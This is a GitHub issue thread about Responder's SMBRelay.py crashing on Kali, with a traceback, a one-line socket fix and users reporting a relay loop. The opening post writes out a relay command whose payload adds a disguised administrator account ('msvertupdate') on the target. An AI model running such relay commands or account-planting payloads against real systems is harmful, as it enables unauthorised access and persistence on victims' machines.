### ISSUE TITLE
SMBRelay.py crashes

### ISSUE THREAD

**Issue by s3c** [SpiderLabs/Responder#113]
I'm currently running responder 2.3.2.4 on kali rolling, when executing smbrelay it dies with an exception, as shown below:

```
root@host:/usr/share/responder/tools# ./SMBRelay.py -i x.x.x.x -c 'net user msvertupdate msvertupdate /add && net localgroup administrators msvertupdate /add' -t y.y.y.y -u user1 user2 user3

Responder SMBRelay 0.1
Please send bugs/comments to: laurent.gaffie@gmail.com
Use this script in combination with Responder.py for best results (remember to set SMB = Off in Responder.conf)..
Usernames  to relay (-u) are case sensitive.
To kill this script hit CRTL-C or Enter
Will relay credentials for these users: user1 user2 user3

Target is running:  ('Windows 7 Enterprise 7601 Service Pack 1', 'Windows 7 Enterprise 6.1')
Unhandled exception in thread started by <function RunInloop at 0x7fdeb7a81b18>
Traceback (most recent call last):
  File "./SMBRelay.py", line 406, in RunInloop
    worker = RunRelay(Target,Command,Domain)
  File "./SMBRelay.py", line 223, in RunRelay
    s = socket(AF_INET, SOCK_STREAM)
TypeError: 'module' object is not callable

```

I did disable SMB in Responder.conf, and can't think of anything else that might be causing this.

**Comment by kaluche** [comment]
I changed this :
` s = socket(AF_INET, SOCK_STREAM)`
To this :
` s = socket.socket(AF_INET, SOCK_STREAM)`

But I'm still having issue to make the relay work ... It's looping on : 
```
Target is running:  ('Windows 7 Professional 7601 Service Pack 1', 'Windows 7 Professional 6.1')
Key retrieved is: from host:192.168.56.102
```

**Comment by ducnp** [comment]
I'm same issue on Kali Rolling

**Comment by ab7ung** [comment]
Facing the same issue on Kali....
